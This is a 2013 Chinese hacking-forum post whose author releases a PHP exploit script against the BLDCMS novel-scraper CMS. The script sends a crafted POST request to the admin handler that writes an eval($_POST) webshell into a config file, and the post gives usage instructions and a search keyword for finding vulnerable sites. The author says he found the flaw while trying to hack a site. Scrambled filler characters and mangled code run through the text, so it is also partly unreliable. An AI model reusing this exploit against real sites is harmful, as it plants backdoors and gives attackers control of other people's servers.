之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞7 Y( A' z/ p1 b! F ~
- `9 t, E1 s1 V0 t' ~, Y; W
, u* t! K) ^# g, T8 \! l# Z话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 7 E! s& a; L/ l/ p7 u
7 b' C t' i% h9 w+ R! E既然都有人发了 我就把我之前写好的EXP放出来吧) K9 p, I0 H) p0 Q1 q: z
. r; ?' E$ K2 G( R% R5 d
view source print?01.php;">: _% {& K- k/ y1 Q6 n& M* y* @
02.<!--?php1 P7 T' Q1 n, M! t8 }
03.echo "-------------------------------------------------------------------
( ~; z9 @5 G' q* n' Y04. I* C$ k) B4 `& K5 A2 ^9 s
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
; S; i/ e/ G* U, _' d/ E$ L06. + E( S. n: V' a7 f. H
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
, r& D; I' {% {5 c: n08. 5 [& g) v/ R- ?- k
09.QQ:981009941\r\n 2013.3.21\r\n ' a' q' {+ ^1 Y6 b7 W
10.
5 c0 H B$ k- D( C% Z) T, O11. ' k2 u' ]+ J7 e2 S6 a
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码 z z5 ~/ ^& g
13.
* l4 Z6 s5 m1 C: }6 Y3 Y7 d14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
- a% f! X4 h8 g2 K" S6 X- P15. ) _* m, C0 Y8 b# i( S
16.--------------------------------------------------------------------\r\n";" L9 b$ X3 g5 b
17.$url=$argv[1];
3 p+ U& |! C4 [8 X0 Q+ x5 |18.$dir=$argv[2];8 G0 N; S P/ ^- f9 ]' g
19.$pass=$argv[3];
, e; m- Z7 I1 A2 f4 C: s1 X' h20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
* Y4 g6 e! e9 q8 I21.if (emptyempty($pass)||emptyempty($url))
$ v7 }# o: O8 D0 p* v3 E5 G22.{exit("请输入参数");}
8 _6 e$ V1 |/ ` B6 b23.else3 Y. X& V4 m: T, j# U
24.{7 d, Z' l3 r& @ O' Z8 ^
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
6 g8 q' p2 C( D" Q26.
# ]9 K1 Z/ n+ k7 s! s27.al;
3 V& r" F5 p/ T! [28.$length = strlen($fuckdata);0 ]! }" Y8 t4 c& z4 e$ ?
29.function getshell($url,$pass)
. Z1 j. o" c8 r7 Q7 j) s30.{
: ~+ C5 c4 p9 f5 [: F" l31.global $url,$dir,$pass,$eval,$length,$fuckdata;2 P' u E# ~" E% S
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
3 `& ?) Y/ D. {8 a L: J33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
, x ?/ U( O( s& H" }4 l7 R34.$header .= "User-Agent: MSIE\r\n";. Z: ]+ M( ?& Z* ^# B
35.$header .= "Host:".$url."\r\n";
" s5 A, }1 n0 c8 s9 d36.$header .= "Content-Length: ".$length."\r\n";
. F+ K% y* y [7 z37.$header .= "Connection: Close\r\n";6 d. ?# t @: Q; ]' W
38.$header .="\r\n";, Z5 A- c) o3 r! n" n7 @5 ?* S. ^6 s/ O
39.$header .= $fuckdata."\r\n\r\n";* U( B' D) c) y* H1 K R
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
' j) F/ Q# I1 P! `$ O41.if (!$fp)
( T+ m' K- W2 P2 }% _" E42.{
. V: A( V2 z9 f, |43.exit ("利用失败:请检查指定目标是否能正常打开");2 G! V8 e) O3 U/ A. F5 g
44.} w/ @' h! F+ d! C
45.else{ if (!fputs($fp,$header))' w8 p) ?* f" j8 J5 t4 V, U4 @$ P) R
46.{exit ("利用失败");}4 A: c% B; i$ E% [! }
47.else! H! S' I$ s5 s: T1 U* O+ W4 Q8 W
48.{$ V+ z$ m9 p+ L: b+ _. f
49.$receive = '';
1 u1 @7 {, I5 i: V7 k* s! q50.while (!feof($fp)) {0 @8 O. l- ^* Q
51.$receive .= @fgets($fp, 1000);9 e' [9 g# r3 E C0 }, }# O
52.}
6 t( o6 l- N+ v53.@fclose($fp);. G" O H( \& [. { B, w1 u% \
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标$ P( Q/ m1 @; E* O+ i5 R
55.
+ ]/ H. O/ K; }1 e# g+ W# }: H56.GPC是否=off)";
) C% a- {- \ e4 `" v. [4 I# I57.}}
+ b6 B! O7 ]3 }' a w, v$ E8 x58.}6 g: ?& n2 D8 m F1 B, v
59.}
! |% O$ V" _( ^60.getshell($url,$pass);
7 v& H3 ~8 Z8 S# p: |61.?-->
4 }) o/ Z; a: E7 y- S/ s2 }
1 ^8 P; z4 s; J' V3 O8 ]; ]$ g0 F8 a5 y, J, s1 z8 d
4 _. S3 b2 X Z% y5 ^1 g. p
by 数据流
5 G* t# P; z8 l8 F. k |
发表于 2013-3-26 20:49:10
收藏
支持
反对